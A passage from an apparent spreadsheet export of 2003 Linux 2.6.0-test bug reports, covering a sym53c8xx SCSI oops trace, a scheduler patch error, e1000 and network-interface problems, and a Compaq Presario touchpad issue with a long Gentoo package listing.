kernel: [syscall_call+7/11] syscall_call+0x7/0xb 20:35:35 caliban kernel: [&lt;c0109c77&gt;] syscall_call+0x7/0xb 20:35:35 caliban kernel: 20:35:35 caliban kernel: Code: 8b 32 89 45 f0 74 2d 8d 74 26 00 8b 5a f4 8d 42 f4 ff 75 14 20:35:55 caliban kernel: drivers/scsi/scsi_error.c:73: spin_lock(drivers/scsi/sym53c8xx_2/sym_glue.c:c2e3d038) already locked by drivers/scsi/scsi.c/441 20:35:55 caliban kernel: Unable to handle kernel paging request at virtual address 5a5a5a5a 20:35:55 caliban kernel: printing eip: 20:35:55 caliban kernel: c01d4d61 20:35:55 caliban kernel: *pde = 00000000 20:35:55 caliban kernel: Oops: 0000 [#3] 20:35:55 caliban kernel: CPU: 0 20:35:55 caliban kernel: EIP: 0060:[vsnprintf+673/1056] Not tainted 20:35:55 caliban kernel: EIP: 0060:[&lt;c01d4d61&gt;] Not tainted 20:35:55 caliban kernel: EFLAGS: 00010097 20:35:55 caliban kernel: EIP is at vsnprintf+0x2a1/0x420 20:35:55 caliban kernel: eax: 5a5a5a5a ebx: 5a5a5a5a ecx: 5a5a5a5a edx: fffffffe 20:35:55 caliban kernel: esi: c0334646 edi: 00000000 ebp: c2e19de4 esp: c2e19dc8 20:35:55 caliban kernel: ds: 007b es: 007b ss: 0068 20:35:55 caliban kernel: Process scsi_eh_0 (pid: 1084, threadinfo=c2e18000 task=c2e3f000) 20:35:55 caliban kernel: Stack: 00000861 ffffffff ffffffff c03341df c0333de0 00000046 00000000 c2e19e28 20:35:55 caliban kernel: c011d8fb c0333de0 00000400 c896b9af c2e19e3c c2e43000 c4ffd004 00000000 20:35:55 caliban kernel: c2e19e20 c01d4f13 c2e19e74 3d1e618c c896b9a6 c2e43000 c4ffd004 00000000 20:35:55 caliban kernel: Call Trace: 20:35:55 caliban kernel: [printk+347/864] printk+0x15b/0x360 20:35:55 caliban kernel: [&lt;c011d8fb&gt;] printk+0x15b/0x360 20:35:55 caliban kernel: [vsprintf+19/32] vsprintf+0x13/0x20 20:35:55 caliban kernel: [&lt;c01d4f13&gt;] vsprintf+0x13/0x20 20:35:55 caliban kernel: [__crc_add_disk+2170464/6434250] sym_eh_handler+0x5c/0x480 [sym53c8xx] 20:35:55 caliban kernel: [&lt;c8960cdc&gt;] sym_eh_handler+0x5c/0x480 [sym53c8xx] 20:35:55 caliban kernel: [update_process_times+43/64] update_process_times+0x2b/0x40 20:35:55 caliban kernel: [&lt;c012686b&gt;] update_process_times+0x2b/0x40 20:35:55 caliban kernel: 20:35:55 caliban kernel: Code: 80 38 00 74 07 40 4a 83 fa ff 75 f4 29 c8 83 e7 10 89 45 e4 Steps to reproduce: Don't really know, but I did: modprobe sym53c8xx modprobe sd_mod mount /dev/scsi/... /mnt/somewhere umount /mnt/somewhere rmmod sym53c8xx modprobe sym53c8xx</t>
  </si>
  <si>
    <t>CAN_MIGRATE broken</t>
  </si>
  <si>
    <t>2003-09-10 06:57 UTC</t>
  </si>
  <si>
    <t>2003-09-30 07:28 UTC</t>
  </si>
  <si>
    <t>Software Environment: 2.6.0-test5 Problem Description: This patch: http://linux.bkbits.net:8080/linux-2.5/diffs/kernel/sched.c@1.202?nav=index.html|src/|src/kernel|hist/kernel/sched.c is broken. "!idle" should be "idle". Or better yet, use the can_migrate function from the mm tree.</t>
  </si>
  <si>
    <t>e1000 drivers needs updating</t>
  </si>
  <si>
    <t>2.6.0-pre5</t>
  </si>
  <si>
    <t>2003-09-11 05:26 UTC</t>
  </si>
  <si>
    <t>2003-09-11 09:09 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: NEC versa P520 notebook This notebook has a NIC that is unsupported by the stock kernel. It is however supported by the Intel GPL driver available from intel.com (e1000-5.2.16.tar.gz) I can build the driver as module against 2.4.22 but it'll only work for a few seconds before loosing the connection and me having to do a reboot to get the NIC working again for another few seconds. The driver build fails against 2.6.0-pre5. Since the university bought &gt;1000 of these laptops for students I think it'll be appreciated very much if someone would update the old e1000 driver that is currently in 2.4.22 and 2.6.0-pre5. (and fix the new Intel driver). Also sent an email to linux.nics@intel.com regarding this issue.</t>
  </si>
  <si>
    <t>Changing link status of the interface up and down gets stuck</t>
  </si>
  <si>
    <t>2.6.0-test4 and 2.6.0-test5</t>
  </si>
  <si>
    <t>2003-09-11 05:58 UTC</t>
  </si>
  <si>
    <t>2005-02-19 05:40 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 9 Hardware Environment: Pentium II, tulip and 3com (3c59x) network cards. Software Environment: gcc 3.2.2 binutils 2.13.90 net-tools 1.60 iproute-2.4.7 Problem Description: When I execute commands ifconfig ethX up ifconfig ethX down ifconfig ethX up ifconfig ethX down the last command never finishes and becomes stuck in the kernel. The same behavior happens if I use 'ip link set' command.</t>
  </si>
  <si>
    <t>Synaptics Mouse Pad is funky on Compaq Presario 2100</t>
  </si>
  <si>
    <t>2.6.0test5, and several of the previous versions</t>
  </si>
  <si>
    <t>2003-09-11 16:29 UTC</t>
  </si>
  <si>
    <t>2003-10-06 08:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Compaq Presario 2100 Laptop AthlonXP 2200 and 512MB RAM Software Environment: Gentoo Linux with X and KDE (See large output of current versions of everything installed at end) Problem Description: The Synaptics mousepad does not respond at all when no other mouse is plugged into the laptop. If a PS/2 mouse is plugged in, then the mousepad responds smoothly, as does the PS/2 mouse. If a USB mouse is plugged in, then the mouse pad will respond, but hesitantly, and only very soon after moving the USB mouse around. The USB mouse works fine. There are log entries (reproduced below) indicating an error. This same laptop works fine with a 2.4 series kernel. Steps to reproduce: Simply compile the kernel and start up X. I use KDE as my window manager. Log file containing mouse recognition and error: Sep 11 19:09:29 [kernel] Synaptics Touchpad, model: 1 Sep 11 19:09:29 [kernel] input: Synaptics Synaptics TouchPad on isa0060/serio1 Sep 11 19:09:36 [kernel] Synaptics driver lost sync at 1st byte Sep 11 19:09:36 [kernel] Synaptics driver lost sync at 1st byte Sep 11 19:09:51 [kernel] Synaptics driver lost sync at 1st byte Sep 11 19:09:51 [kernel] Synaptics driver lost sync at 1st byte Gentoo Installed Package Version Status: ./sys-kernel ./sys-kernel/development-sources-2.6.0_beta2 ./sys-kernel/development-sources-2.6.0_beta3 ./sys-kernel/development-sources-2.6.0_beta4 ./sys-kernel/development-sources-2.6.0_beta5 ./sys-kernel/linux-headers-2.4.19 ./sys-kernel/vanilla-sources-2.4.21 ./sys-kernel/vanilla-sources-2.4.22 ./dev-cpp ./dev-cpp/gtkmm-1.2.9-r2 ./dev-cpp/gnomemm-1.2.3-r1 ./x11-base ./x11-base/xfree-4.3.0-r2 ./x11-base/opengl-update-1.5 ./x11-base/xfree-drm-4.3.0-r6 ./x11-libs ./x11-libs/qt-2.3.2-r1 ./x11-libs/wxGTK-2.4.0 ./x11-libs/pango-1.2.3 ./x11-libs/pango-1.2.1-r1 ./x11-libs/libwnck-2.2.1 ./x11-libs/gtk+-2.2.1-r1 ./x11-libs/gtk+-1.2.10-r10 ./x11-libs/qt-3.1.2-r4 ./x11-libs/openmotif-2.2.2-r1 ./x11-libs/Xaw3d-1.5-r1 ./x11-libs/startup-notification-0.5 ./x11-misc ./x11-misc/ttmkfdir-3.0.9 ./x11-misc/grpn-1.1.2 ./x11-misc/xloadimage-4.1-r1 ./games-strategy ./games-strategy/liquidwar-5.5.9 ./games-strategy/freecraft-fcmp-1.18-r1 ./games-strategy/freecraft-1.18-r1 ./dev-tcltk ./dev-tcltk/itcl-3.2-r2 ./app-admin ./app-admin/sudo-1.6.7_p5 ./app-admin/addpatches-0.2 ./app-admin/metalog-0.6-r10 ./app-admin/fam-oss-2.6.9-r3 ./app-admin/apg-2.1.0 ./app-dicts ./app-dicts/aspell-en-0.51.0 ./app-crypt ./app-crypt/mit-krb5-1.2.7 ./app-crypt/kgpg-1.0.0 ./app-crypt/gnupg-1.2.2-r1 ./app-crypt/mhash-0.8.18-r1 ./app-crypt/gringotts-1.2.3 ./app-games ./x11-themes ./x11-themes/gtk-engines-thinice-2.0.2 ./x11-themes/gnome-themes-2.2.1 ./x11-themes/gtk-engines-metal-2.2.0 ./x11-themes/gtk-engines-pixbuf-2.2.0 ./x11-themes/gtk-engines-redmond95-2.2.0 ./x11-themes/gnome-icon-theme-1.0.5 ./gnome-base ./gnome-base/libglade-2.0.1 ./gnome-base/gnome-vfs-2.2.4 ./gnome-base/libgnomeprint-2.2.1.2 ./gnome-base/gnome-vfs-1.0.5-r3 ./gnome-base/libglade-0.17-r6 ./gnome-base/bonobo-activation-2.2.2 ./gnome-base/libghttp-1.0.9-r3 ./gnome-base/gconf-1.0.8-r5 ./gnome-base/gnome-panel-1.4.2-r2 ./gnome-base/ORBit2-2.6.1 ./gnome-base/control-center-1.4.0.5-r1 ./gnome-base/gail-1.2.1 ./gnome-base/libbonobo-2.2.2 ./gnome-base/gnome-desktop-2.2.1-r1 ./gnome-base/oaf-0.6.10 ./gnome-base/gnome-panel-2.2.2.1 ./gnome-base/gnome-common-1.2.4-r3 ./gnome-base/libbonoboui-2.2.0.1 ./gnome-base/gconf-2.2.0 ./gnome-base/ORBit-0.5.17 ./gnome-base/libgnomecanvas-2.2.0.2 ./gnome-base/libgnomeprintui-2.2.1.2 ./gnome-base/libgnomeui-2.2.1 ./gnome-base/gnome-print-0.35-r3 ./gnome-base/bonobo-1.0.22 ./gnome-base/gnome-libs-1.4.2 ./gnome-base/libgnome-2.2.2 ./gnome-base/gnome-mime-data-2.2.0 ./app-arch ./app-arch/cabextract-0.6 ./app-arch/ncompress-4.2.4 ./app-arch/rpm-4.0.4-r5 ./app-arch/unzip-5.50-r2 ./app-arch/rpm2targz-8.0 ./app-arch/zip-2.3-r1 ./app-misc ./app-misc/lirc-0.6.6-r1 ./app-misc/glimpse-4.15-r1 ./app-text ./app-text/openjade-1.3.1-r6 ./app-text/gnome-spell-1.0.4 ./app-text/jadetex-3.12 ./app-text/docbook-sgml-1.0 ./app-text/ghostscript-7.05.6-r3 ./app-text/xpdf-2.02.1 ./app-text/sablotron-0.97 ./app-text/texi2html-1.64 ./app-text/tetex-1.0.7-r13 ./app-text/aspell-0.50.3 ./app-text/sgmltools-lite-3.0.3-r6 ./app-text/enscript-1.6.3-r1 ./app-text/gnome-spell-0.5 ./app-text/docbook-sgml-utils-0.6.12 ./app-text/docbook-xsl-stylesheets-1.60.1 ./app-text/dgs-0.5.10-r1 ./app-text/docbook-sgml-dtd-4.2 ./app-text/docbook-sgml-dtd-3.0-r1 ./app-text/docbook-sgml-dtd-3.1-r1 ./app-text/docbook-dsssl-stylesheets-1.77-r2 ./app-text/psutils-1.17 ./app-text/docbook-sgml-dtd-4.0-r1 ./app-text/docbook-sgml-dtd-4.1-r1 ./app-text/docbook-xml-simple-dtd-4.1.2.4 ./app-text/sgml-common-0.6.3-r3 ./app-text/a2ps-4.13b-r4 ./app-text/scrollkeeper-0.3.11-r1 ./app-text/docbook-xml-dtd-4.1.2-r3 ./net-firewall ./net-firewall/iptables-1.2.8-r1 ./net-firewall/knetfilter-3.1.1 ./net-firewall/kmyfirewall-0.9.6 ./app-portage ./app-portage/kemerge-0.7 ./app-portage/kportage-0.6.1 ./app-portage/gentoolkit-0.1.28 ./app-portage/mirrorselect-0.7-r1 ./sys-devel ./sys-devel/make-3.80 ./sys-devel/libtool-1.4.3-r1 ./sys-devel/bin86-0.16.0 ./sys-devel/bison-1.35 ./sys-devel/gcc-config-1.3.3-r1 ./sys-devel/automake-1.7.5-r2 ./sys-devel/patch-2.5.9 ./sys-devel/autoconf-2.57-r1 ./sys-devel/binutils-2.14.90.0.6-r2 ./sys-devel/gdb-5.3 ./sys-devel/gnuconfig-20030708 ./sys-devel/flex-2.5.4a-r5 ./sys-devel/m4-1.4 ./sys-devel/bc-1.06-r5 ./sys-devel/gcc-3.2.3-r1 ./sys-devel/gettext-0.11.5-r1 ./sys-devel/libperl-5.8.0 ./dev-db ./dev-db/postgresql-7.3.3 ./dev-db/unixODBC-2.0.6 ./dev-db/mysql-4.0.13-r3 ./kde-base ./kde-base/kdeutils-3.1.3 ./kde-base/kde-3.1.3 ./kde-base/kdeadmin-3.1.3 ./kde-base/kdegraphics-3.1.3 ./kde-base/kdetoys-3.1.3 ./kde-base/kdegames-3.1.3 ./kde-base/kdemultimedia-3.1.3 ./kde-base/kdeartwork-3.1.3 ./kde-base/kdeedu-3.1.3 ./kde-base/kdeaddons-3.1.3 ./kde-base/arts-1.1.3 ./kde-base/kdepim-3.1.3 ./kde-base/kdenetwork-3.1.3 ./kde-base/kdebindings-3.1.2 ./kde-base/kdebindings-3.1.3 ./kde-base/kdelibs-3.1.3-r1 ./kde-base/kde-env-3-r2 ./kde-base/kdebase-3.1.3 ./media-gfx ./media-gfx/gimp-1.2.4 ./media-gfx/sane-backends-1.0.11 ./media-gfx/gphoto2-2.1.1-r1 ./media-gfx/transfig-3.2.4-r1 ./media-gfx/imagemagick-5.5.6-r1 ./media-gfx/gimp-print-4.2.5 ./media-gfx/graphviz-1.9 ./net-ftp ./net-ftp/ftp-0.17-r2 ./net-ftp/curl-7.10.5-r1 ./net-nds ./net-nds/portmap-5b-r7 ./net-www ./net-www/lynx-2.8.4.1c ./net-www/mozilla-1.4-r3 ./net-www/htdig-3.1.6-r4 ./media-libs ./media-libs/libsndfile-1.0.4 ./media-libs/id3lib-3.8.3-r1 ./media-libs/libdvdnav-0.1.3 ./media-libs/divx4linux-20020418-r2 ./media-libs/lcms-1.09 ./media-libs/xine-lib-1_beta12 ./media-libs/aalib-1.4_rc4-r2 ./media-libs/glut-3.7.1 ./media-libs/t1lib-1.3.1 ./media-libs/libpng-1.2.5-r4 ./media-libs/libao-0.8.3-r1 ./media-libs/ming-0.2a ./media-libs/libvorbis-1.0-r2 ./media-libs/libdvdcss-1.2.6 ./media-libs/fontconfig-2.2.1 ./media-libs/freetype-1.3.1-r3 ./media-libs/libungif-4.1.0.1b ./media-libs/giflib-4.1.0-r3 ./media-libs/libogg-1.0 ./media-libs/imlib-1.9.14-r1 ./media-libs/libart_lgpl-2.3.14 ./media-libs/libgphoto2-2.1.1-r2 ./media-libs/win32codecs-0.90.1-r2 ./media-libs/alsa-lib-0.9.2 ./media-libs/libsdl-1.2.5-r2 ./media-libs/svgalib-1.4.3-r4 ./media-libs/flac-1.1.0 ./media-libs/libmad-0.15.0b-r1 ./media-libs/a52dec-0.7.4 ./media-libs/nas-1.6 ./media-libs/quicktime4linux-1.5.5-r1 ./media-libs/audiofile-0.2.3-r1 ./media-libs/libexif-0.5.9 ./media-libs/libflash-0.4.10-r1 ./media-libs/allegro-4.0.3 ./media-libs/faad2-1.1 ./media-libs/mpeg-lib-1.3.1-r1 ./media-libs/libmpeg3-1.5-r1 ./media-libs/libggi-2.0.1-r1 ./media-libs/jbigkit-1.4 ./media-libs/xvid-0.9.1 ./media-libs/freetype-2.1.4 ./media-libs/libmikmod-3.1.10-r1 ./media-libs/libgii-0.8.1 ./media-libs/jpeg-6b-r3 ./media-libs/libswf-0.99 ./media-libs/pdflib-4.0.3-r1 ./media-libs/libmng-1.0.4 ./media-libs/libdvdread-0.9.4 ./media-libs/libwmf-0.2.8 ./media-libs/libdv-0.99 ./media-libs/libfame-0.9.0 ./media-libs/compface-1.4 ./media-libs/libid3tag-0.15.0b ./media-libs/tiff-3.5.7-r1 ./media-libs/gdk-pixbuf-0.21.0 ./media-libs/netpbm-10.11.5-r2 ./sys-apps ./sys-apps/pam-login-3.11 ./sys-apps/hotplug-20030501-r2 ./sys-apps/netkit-base-0.17-r8 ./sys-apps/hdparm-5.4 ./sys-apps/man-1.5l-r6 ./sys-apps/sed-4.0.7 ./sys-apps/util-linux-2.11z-r6 ./sys-apps/findutils-4.1.7-r4 ./sys-apps/textutils-2.1 ./sys-apps/kbd-1.06-r1 ./sys-apps/setserial-2.17-r2 ./sys-apps/tcp-wrappers-7.6-r4 ./sys-apps/acpid-1.0.2-r1 ./sys-apps/e2fsprogs-1.33 ./sys-apps/psmisc-21.2-r3 ./sys-apps/fileutils-4.1.11-r1 ./sys-apps/baselayout-1.8.6.8-r1 ./sys-apps/usbutils-0.11-r1 ./sys-apps/attr-2.2.0 ./sys-apps/cpufreqd-1.0.1 ./sys-apps/portage-2.0.49-r3 ./sys-apps/pciutils-2.1.10-r1 ./sys-apps/less-381 ./sys-apps/eject-2.0.12-r1 ./sys-apps/modutils-2.4.25 ./sys-apps/miscfiles-1.3-r2 ./sys-apps/grep-2.5.1-r1 ./sys-apps/ed-0.2-r3 ./sys-apps/acl-2.1.1-r1 ./sys-apps/grub-0.93.20030118 ./sys-apps/tar-1.13.25-r3 ./sys-apps/diffutils-2.8.4-r3 ./sys-apps/cpio-2.5 ./sys-apps/module-init-tools-0.9.12-r1 ./sys-apps/devfsd-1.3.25-r3 ./sys-apps/supersed-3.58-r2 ./sys-apps/help2man-1.29 ./sys-apps/cronbase-0.2.1-r2 ./sys-apps/bzip2-1.0.2-r2 ./sys-apps/man-pages-1.56 ./sys-apps/sh-utils-2.0.15 ./sys-apps/gzip-1.3.3-r2 ./sys-apps/net-tools-1.60-r7 ./sys-apps/xinetd-2.3.12 ./sys-apps/gawk-3.1.3 ./sys-apps/debianutils-1.16.7-r2 ./sys-apps/shadow-4.0.3-r6 ./sys-apps/texinfo-4.5 ./sys-apps/procps-3.1.9 ./sys-apps/sharutils-4.2.1-r6 ./sys-apps/groff-1.18.1-r3 ./sys-apps/fbset-2.1 ./sys-apps/pcmcia-cs-3.2.4 ./sys-apps/reiserfsprogs-3.6.8 ./sys-apps/vcron-3.0.1-r1 ./sys-apps/file-4.02 ./sys-apps/slocate-2.7-r2 ./sys-apps/which-2.14 ./sys-libs ./sys-libs/pam-0.75-r11 ./sys-libs/gpm-1.20.1 ./sys-libs/readline-4.3-r4 ./sys-libs/db-1.85-r1 ./sys-libs/ncurses-5.3-r1 ./sys-libs/db-3.2.9-r7 ./sys-libs/zlib-1.1.4-r1 ./sys-libs/gdbm-1.8.0-r5 ./sys-libs/glibc-2.3.2-r1 ./sys-libs/libieee1284-0.2.1 ./sys-libs/cracklib-2.7-r7 ./sys-libs/pwdb-0.61-r4 ./sys-libs/slang-1.4.5-r2 ./sys-libs/db-4.0.14-r2 ./app-emulation ./app-emulation/wine-20030813 ./net-fs ./net-fs/samba-2.2.8a ./net-im ./net-im/kopete-0.7.1 ./net-libs ./net-libs/libpcap-0.7.2 ./net-libs/libnet-1.1.0-r2 ./net-libs/libsoup-1.99.23 ./net-libs/c-client-2002d ./net-libs/openslp-1.0.11 ./net-libs/libnet-1.0.2a-r2 ./net-libs/soup-0.7.11 ./net-libs/linc-1.0.2 ./net-libs/libwww-5.4.0-r1 ./net-mail ./net-mail/evolution-1.4.3 ./net-mail/ssmtp-2.48 ./net-mail/mailbase-0.00-r5 ./net-misc ./net-misc/openssh-3.6.1_p2 ./net-misc/bridge-utils-0.9.6 ./net-misc/wget-1.8.2-r2 ./net-misc/monmotha-2.3.8_pre7 ./net-misc/dhcpcd-1.3.22_p4-r1 ./net-misc/ntp-4.1.1b-r6 ./net-misc/whois-4.6.6 ./net-misc/rsync-2.5.6-r3 ./net-misc/tightvnc-1.2.8 ./net-misc/iputils-020927 ./net-print ./net-print/cups-1.1.19-r1 ./net-print/foomatic-2.0.0 ./games-board ./games-board/xfrisk-1.2 ./app-office ./app-office/openoffice-1.0.3-r1 ./app-office/koffice-1.2.1-r1 ./dev-java ./dev-java/java-sdk-docs-1.3.1 ./dev-java/java-sdk-docs-1.4.1 ./dev-java/java-config-0.2.8 ./dev-java/ant-1.5.3-r4 ./dev-java/blackdown-jdk-1.4.1 ./dev-java/blackdown-jre-1.4.1 ./dev-lang ./dev-lang/nasm-0.98.36 ./dev-lang/perl-5.8.0-r12 ./dev-lang/python-2.2.3-r1 ./dev-lang/tk-8.3.4-r1 ./dev-lang/tcl-8.3.4 ./dev-lang/ruby-1.6.8-r1 ./dev-libs ./dev-libs/libxslt-1.0.31 ./dev-libs/DirectFB-0.9.18 ./dev-libs/openssl-0.9.6j ./dev-libs/libxml2-2.5.8 ./dev-libs/popt-1.7-r1 ./dev-libs/glib-2.2.2 ./dev-libs/libunicode-0.4-r1 ./dev-libs/libgringotts-1.1.2 ./dev-libs/gmp-4.1-r1 ./dev-libs/libxml-1.8.17-r2 ./dev-libs/glib-1.2.10-r5 ./dev-libs/libpcre-4.2-r1 ./dev-libs/cdk-4.9.10.20020809 ./dev-libs/nspr-4.3 ./dev-libs/nss-3.8 ./dev-libs/libsigc++-1.0.4-r2 ./dev-libs/libusb-0.1.7 ./dev-libs/expat-1.95.6-r1 ./dev-libs/atk-1.2.3 ./dev-libs/atk-1.2.4 ./dev-libs/libmcrypt-2.5.7 ./dev-libs/libmal-0.31 ./dev-libs/libIDL-0.8.2 ./dev-perl ./dev-perl/HTML-Tagset-3.03-r2 ./dev-perl/XML-RegExp-0.03-r1 ./dev-perl/Parse-RecDescent-1.94 ./dev-perl/PlRPC-0.2016-r1 ./dev-perl/MP3-Info-1.02 ./dev-perl/URI-1.23 ./dev-perl/libnet-1.16 ./dev-perl/Storable-2.07 ./dev-perl/Audio-Tools-0.01 ./dev-perl/SGMLSpm-1.03-r4 ./dev-perl/Finance-Quote-1.07 ./dev-perl/XML-Parser-2.31-r1 ./dev-perl/Safe-2.09 ./dev-perl/Test-Harness-2.28 ./dev-perl/Audio-Wav-0.02 ./dev-perl/HTML-TableExtract-1.08 ./dev-perl/libwww-perl-5.69 ./dev-perl/MIME-Base64-2.20 ./dev-perl/gtk-perl-0.7008-r9 ./dev-perl/ExtUtils-F77-1.14-r1 ./dev-perl/DBI-1.37 ./dev-perl/PDL-2.4.0 ./dev-perl/DBD-mysql-2.1027 ./dev-perl/Text-Balanced-1.95 ./dev-perl/Digest-MD5-2.24 ./dev-perl/Data-Dumper-2.101 ./dev-perl/Inline-0.44 ./dev-perl/HTML-Parser-3.28 ./dev-perl/Filter-1.29 ./dev-perl/Net-Daemon-0.37 ./dev-perl/XML-Writer-0.4-r2 ./dev-util ./dev-util/kdevelop-2.1.5 ./dev-util/kdevelop-3.0_alpha4-r1 ./dev-util/indent-2.2.9 ./dev-util/tkcvs-7.1.2 ./dev-util/gob-1.0.12 ./dev-util/gtk-doc-1.0 ./dev-util/yacc-1.9.1-r1 ./dev-util/kdoc-2.0_alpha54 ./dev-util/ddd-3.3.1-r3 ./dev-util/kdbg-1.2.9 ./dev-util/dialog-0.9_beta20030308-r1 ./dev-util/cvs-1.11.6 ./dev-util/insight-5.2.1 ./dev-util/guile-1.4.1 ./dev-util/pccts-1.33.33 ./dev-util/intltool-0.26 ./dev-util/cscope-15.3 ./dev-util/lincvs-1.2.0 ./dev-util/ctags-5.5-r1 ./dev-util/gob-2.0.6 ./dev-util/pkgconfig-0.15.0 ./dev-python ./dev-python/python-fchksum-1.6.1-r1 ./dev-python/egenix-mx-base-2.0.4 ./dev-python/pyxml-0.8.2 ./dev-python/python-docs-2.2.3 ./net-wireless ./net-wireless/linux-wlan-ng-0.2.0-r2 ./net-wireless/airsnort-0.2.1b ./net-wireless/kismet-2.8.1-r1 ./net-wireless/wireless-tools-25-r1 ./app-editors ./app-editors/xemacs-21.4.12 ./app-editors/vim-6.2-r2 ./app-editors/vim-core-6.2-r1 ./app-editors/gvim-6.1-r8 ./app-editors/nano-1.2.1 ./app-shells ./app-shells/sash-3.4-r5 ./app-shells/tcsh-6.12-r2 ./app-shells/bash-2.05b-r5 ./media-fonts ./media-fonts/lfpfonts-fix-0.82-r1 ./media-fonts/artwiz-fonts-2.4 ./media-fonts/lfpfonts-var-0.83 ./media-fonts/urw-fonts-2.0-r1 ./media-fonts/freefonts-0.10-r1 ./media-fonts/x11fonts-jmk-3.0 ./media-sound ./media-sound/abcde-2.0.3 ./media-sound/alsa-utils-0.9.2 ./media-sound/xmms-1.2.7-r20 ./media-sound/mpg123-0.59r-r2 ./media-sound/vorbis-tools-1.0-r1 ./media-sound/juk-1.1 ./media-sound/esound-0.2.29-r1 ./media-sound/id3v2-0.1.7 ./media-sound/mad-0.14.2b-r2 ./media-sound/lame-3.93.1-r1 ./media-sound/alsa-tools-0.9.1 ./media-sound/alsa-driver-0.9.2 ./media-sound/cd-discid-0.6 ./media-sound/id3-0.12-r1 ./media-sound/cdparanoia-3.9.8 ./media-video ./media-video/mpeg2vidcodec-12-r1 ./media-video/ogle-0.8.5 ./media-video/xanim-2.80.1-r4 ./media-video/mplayer-0.91 ./media-video/xine-ui-0.9.21 ./gnome-extra ./gnome-extra/gal-1.99.8 ./gnome-extra/bonobo-conf-0.16 ./gnome-extra/gtkhtml-1.1.10 ./gnome-extra/gal-0.24 ./gnome-extra/libgtkhtml-3.0.7 ./app-cdr ./app-cdr/cdrtools-2.01_alpha14 ./app-cdr/cdrdao-1.1.7-r1 ./app-doc ./app-doc/doxygen-1.3 ./app-doc/qt-docs-3.1.2 ./app-doc/kdelibs-apidocs-3.1.3 ./app-pda ./app-pda/gnome-pilot-conduits-2.0.9 ./app-pda/pilot-link-0.11.7-r1 ./app-pda/gnome-pilot-2.0.9 ./app-xemacs ./app-xemacs/pgg-1.02 ./app-xemacs/viper-1.35 ./app-xemacs/gnus-1.65 ./app-xemacs/slider-1.13 ./app-xemacs/ps-print-1.08 ./app-xemacs/ibuffer-1.08 ./app-xemacs/xemacs-base-1.75 ./app-xemacs/mew-1.17 ./app-xemacs/dictionary-1.11 ./app-xemacs/textools-1.14 ./app-xemacs/pcomplete-1.02 ./app-xemacs/edt-1.12 ./app-xemacs/w3-1.28 ./app-xemacs/strokes-1.08 ./app-xemacs/cookie-1.14 ./app-xemacs/supercite-1.19 ./app-xemacs/tooltalk-1.13 ./app-xemacs/misc-games-1.16 ./app-xemacs/ilisp-1.29 ./app-xemacs/crisp-1.12 ./app-xemacs/mh-e-1.17 ./app-xemacs/time-1.12 ./app-xemacs/haskell-mode-1.05 ./app-xemacs/frame-icon-1.09 ./app-xemacs/gnats-1.15 ./app-xemacs/hm-html-menus-1.18 ./app-xemacs/speedbar-1.26 ./app-xemacs/edit-utils-1.98 ./app-xemacs/docbookide-0.06 ./app-xemacs/eterm-1.13 ./app-xemacs/calendar-1.19 ./app-xemacs/mine-1.14 ./app-xemacs/perl-modes-1.04 ./app-xemacs/idlwave-1.28 ./app-xemacs/ess-1.03 ./app-xemacs/texinfo-1.23 ./app-xemacs/ruby-modes-1.01 ./app-xemacs/xemacs-ispell-1.24 ./app-xemacs/bbdb-1.21 ./app-xemacs/liece-1.10 ./app-xemacs/edict-1.13 ./app-xemacs/view-process-1.12 ./app-xemacs/efs-1.29 ./app-xemacs/emerge-1.09 ./app-xemacs/locale-1.20 ./app-xemacs/tm-1.35 ./app-xemacs/build-1.10 ./app-xemacs/skk-1.23 ./app-xemacs/ada-1.13 ./app-xemacs/calc-1.23 ./app-xemacs/dired-1.13 ./app-xemacs/prog-modes-1.72 ./app-xemacs/eudc-1.37 ./app-xemacs/sml-mode-0.07 ./app-xemacs/apel-1.26 ./app-xemacs/vhdl-1.16 ./app-xemacs/sgml-1.08 ./app-xemacs/c-support-1.16 ./app-xemacs/auctex-1.33 ./app-xemacs/edebug-1.15 ./app-xemacs/reftex-1.28 ./app-xemacs/vc-1.35 ./app-xemacs/fsf-compat-1.12 ./app-xemacs/ediff-1.46 ./app-xemacs/eieio-1.04 ./app-xemacs/latin-unity-1.07 ./app-xemacs/pcl-cvs-1.64 ./app-xemacs/vc-cc-1.21 ./app-xemacs/eshell-1.04 ./app-xemacs/lookup-1.13 ./app-xemacs/mail-lib-1.56 ./app-xemacs/leim-1.20 ./app-xemacs/mule-ucs-1.04 ./app-xemacs/ecrypto-0.12 ./app-xemacs/ecb-1.01 ./app-xemacs/pc-1.25 ./app-xemacs/sounds-wav-1.10 ./app-xemacs/vm-7.07 ./app-xemacs/elib-1.10 ./app-xemacs/text-modes-1.58 ./app-xemacs/forms-1.14 ./app-xemacs/fortran-modes-1.02 ./app-xemacs/igrep-1.10 ./app-xemacs/rmail-1.13 ./app-xemacs/clearcase-1.04 ./app-xemacs/footnote-1.15 ./app-xemacs/sh-script-1.17 ./app-xemacs/xslt-process-1.11 ./app-xemacs/sounds-au-1.10 ./app-xemacs/games-1.13 ./app-xemacs/xemacs-devel-1.50 ./app-xemacs/sasl-1.12 ./app-xemacs/scheme-1.13 ./app-xemacs/cc-mode-1.32 ./app-xemacs/tramp-1.11 ./app-xemacs/ocaml-0.04 ./app-xemacs/psgml-dtds-1.02 ./app-xemacs/mmm-mode-1.00 ./app-xemacs/jde-1.43 ./app-xemacs/xslide-1.04 ./app-xemacs/tpu-1.12 ./app-xemacs/mule-base-1.42 ./app-xemacs/sieve-1.11 ./app-xemacs/semantic-1.17 ./app-xemacs/psgml-1.38 ./app-xemacs/egg-its-1.26 ./app-xemacs/debug-1.16 ./app-xemacs/net-utils-1.31 ./app-xemacs/os-utils-1.30 ./app-xemacs/zenirc-1.13 ./app-xemacs/mailcrypt-2.12 ./app-xemacs/python-modes-1.02 ./net-dialup ./net-dialup/ppp-2.4.1-r14 ./media-plugins ./media-plugins/xine-d5d-0.2.7-r1 ./media-plugins/xine-dmd-1.0.6 ./media-plugins/xine-d4d-0.3.2-r2 ./net-analyzer ./net-analyzer/net-snmp-5.0.6-r1 ./net-analyzer/knetscan-1.0 ./net-analyzer/traceroute-1.4_p12 ./net-analyzer/nmap-3.27-r1 ./net-analyzer/netselect-0.3 ./net-analyzer/portsentry-1.1-r7 ./games-action ./games-action/bombermaze-0.6.6</t>
  </si>
  <si>
    <t>Compaq Presario 2100 Laptop Fails to power down/reboot</t>
  </si>
  <si>
    <t>2.6.0test5</t>
